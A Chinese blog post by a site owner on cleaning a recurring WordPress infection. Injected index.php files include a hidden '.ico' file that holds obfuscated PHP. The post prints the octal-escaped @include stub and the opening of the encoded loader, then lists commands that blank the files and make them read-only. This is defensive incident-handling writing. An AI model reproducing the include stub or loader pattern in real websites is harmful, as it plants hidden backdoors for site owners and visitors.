如何解决 wordpress 的ico文件挂马的问题

阿里云限量代金券发放中

如果您有代购或者代维服务器、PHP网站建设、程序代码修改、系统开发等需求,可以联系我购买付费服务。QQ401313302

如何解决 wordpress 的ico文件挂马的问题

wordpress表现

几个目录莫名出现index.php并且里面的文件为以下内容

<?php
/*5155f*/

@include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co";

/*5155f*/

删掉文件过几天再次出现,应该是wordpress的漏洞导致的,不知道是插件的漏洞还是wordpress本身的漏洞。

image-20200904160946450

删除文件会像小强一样再次出现,改变文件的文件的权限,找到被感染的文件,将文件的权限改成只读 400

我的服务器是centos7

进入wordpress的目录
目录:site
echo ""> ./site/index.php
echo ""> ./site/page.php
chmod 400 -R ./site

img里面是静态文件
# find ./img/ -name 'index.php'
# cat ./img/tui15-01-12/index.php
<?php
/*5155f*/

@include "\057da\164a/\167ww\162oo\164/w\145b/\167ww\056fu\156et\070.c\157m/\167p-\143on\164en\164/f\151le\163/.\0632e\06691\0609.\151co";

/*5155f*/

# echo "hello world"> ./img/*/index.php
-bash: ./img/*/index.php: ambiguous redirect
将文件空白
echo "" > ./img/10baofu/index.php
echo "" > ./img/13apple/index.php
echo "" > ./img/2014/index.php
echo "" > ./img/2015ali-fj/index.php
echo "" > ./img/2015nba-jiezhi/index.php
echo "" > ./img/bf-low/index.php
echo "" > ./img/caipiao/index.php
echo "" > ./img/canren-gif/index.php
echo "" > ./img/china-dxjc/index.php
echo "" > ./img/china-viwe/index.php
echo "" > ./img/chuangyetaolu/index.php
echo "" > ./img/clonezilla-centos/index.php
echo "" > ./img/code-yuyan/index.php
echo "" > ./img/dakai-nao/index.php
echo "" > ./img/deguo-read/index.php
echo "" > ./img/egao-cxy/index.php
echo "" > ./img/guanlan/index.php
echo "" > ./img/HTTP_Status_Code/index.php
echo "" > ./img/jaychow-zhuanji/index.php
echo "" > ./img/jenkins/index.php
echo "" > ./img/kubisbz/gpjifxbt.php
echo "" > ./img/kubisbz/index.php
echo "" > ./img/linux/index.php
echo "" > ./img/nainai-dd/index.php
echo "" > ./img/ndong-gif/index.php
echo "" > ./img/qingzi-love/index.php
echo "" > ./img/qq-ali-work/index.php
echo "" > ./img/R720_system/index.php
echo "" > ./img/tiaoyuepic/index.php
echo "" > ./img/toulanzs/index.php
echo "" > ./img/tui14-10-26b/index.php
echo "" > ./img/tui15-01-12/index.php
echo "" > ./img/tui15-04-12/index.php
echo "" > ./img/vpn_windows/index.php
echo "" > ./img/weixin_bps/index.php
echo "" > ./img/xidada-gif/index.php
echo "" > ./img/xiee-logo/index.php
echo "" > ./img/yamaxun-gif/index.php
echo "" > ./img/yunweioneday/index.php
echo "" > ./img/zhexieci/index.php
echo "" > ./img/zhuangbi-men/index.php
修改文件权限
chmod 400 ./img/10baofu/index.php
chmod 400 ./img/13apple/index.php
chmod 400 ./img/2014/index.php
chmod 400 ./img/2015ali-fj/index.php
chmod 400 ./img/2015nba-jiezhi/index.php
chmod 400 ./img/bf-low/index.php
chmod 400 ./img/caipiao/index.php
chmod 400 ./img/canren-gif/index.php
chmod 400 ./img/china-dxjc/index.php
chmod 400 ./img/china-viwe/index.php
chmod 400 ./img/chuangyetaolu/index.php
chmod 400 ./img/clonezilla-centos/index.php
chmod 400 ./img/code-yuyan/index.php
chmod 400 ./img/dakai-nao/index.php
chmod 400 ./img/deguo-read/index.php
chmod 400 ./img/egao-cxy/index.php
chmod 400 ./img/guanlan/index.php
chmod 400 ./img/HTTP_Status_Code/index.php
chmod 400 ./img/jaychow-zhuanji/index.php
chmod 400 ./img/jenkins/index.php
chmod 400 ./img/kubisbz/gpjifxbt.php
chmod 400 ./img/kubisbz/index.php
chmod 400 ./img/linux/index.php
chmod 400 ./img/nainai-dd/index.php
chmod 400 ./img/ndong-gif/index.php
chmod 400 ./img/qingzi-love/index.php
chmod 400 ./img/qq-ali-work/index.php
chmod 400 ./img/R720_system/index.php
chmod 400 ./img/tiaoyuepic/index.php
chmod 400 ./img/toulanzs/index.php
chmod 400 ./img/tui14-10-26b/index.php
chmod 400 ./img/tui15-01-12/index.php
chmod 400 ./img/tui15-04-12/index.php
chmod 400 ./img/vpn_windows/index.php
chmod 400 ./img/weixin_bps/index.php
chmod 400 ./img/xidada-gif/index.php
chmod 400 ./img/xiee-logo/index.php
chmod 400 ./img/yamaxun-gif/index.php
chmod 400 ./img/yunweioneday/index.php
chmod 400 ./img/zhexieci/index.php
chmod 400 ./img/zhuangbi-men/index.php
# find ./  -name ".*.ico"
./wp-content/files/.32e69109.ico

cat ./wp-content/files/.32e69109.ico
<?php
$_no41yhg = basename/*m8k*/(/*z9c*/trim/*mc*/(/*s*/preg_replace/*50*/(/*x2f*/rawurldecode/*st2*/(/*qa7*/"%2F%5C%28.%2A%24%2F"/*458ix*/)/*x1lbe*/, '', __FILE__/*ac*/)/*bu*//*knaq2*/)/*di*//*u6*/)/*fd1uc*/;$_b4iwx = "GU%12M%17%5DTVP%40%0C%07G%09%40F%17SX%5CoZA%07%17%0AVGm%06D%5CPD%5C%0ENJF%24H8%01S_X%5E%5C%06N%10%1B%5CVS%08iZ%5E%5EMK%11%170MAW%04B%5C%11%17%15%0EXJT%24s%5B%0B_fBUM%06N%06%1D%5C%5C%40%3AZVV%17%15%0E%276%23b%1A%09%25_WXoJK%1DKHB%5CU%3ASKC_K%5DNOO%1E%1A%09%25_WXoJK%1DKHCRJ%3ASATSLZ%00%0C%01qG%5B%08S%1E%1D%10%09%07R%23%0A%5CA%5D%17iKT%40V%5C%1D%0A%01I%1B%02L%0DyBUMq%1D%0A%02Kl%5E%0C%5BPE%18%09%07R%0A%09%06%12V%00PP_U%5D%06K3%27~lw%2Az%1B%18%19BJ%0C%05%06%40V%1AGfqao%7Ca%25AC%0E%11n%0B%14%10%0AMPHIKNJVT%0CX%5CU%18%1EH%00%0F%0AqCG%11iZ%5E%5EMK%07%17%1C%0E%14%1BLM% ....

# echo "">./wp-content/files/.32e69109.ico
# chmod 400 ./wp-content/files/.32e69109.ico

未经允许不得转载:好玩吧 » 如何解决 wordpress 的ico文件挂马的问题

腾讯云全球云服务器1核2G服务器低至2折

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址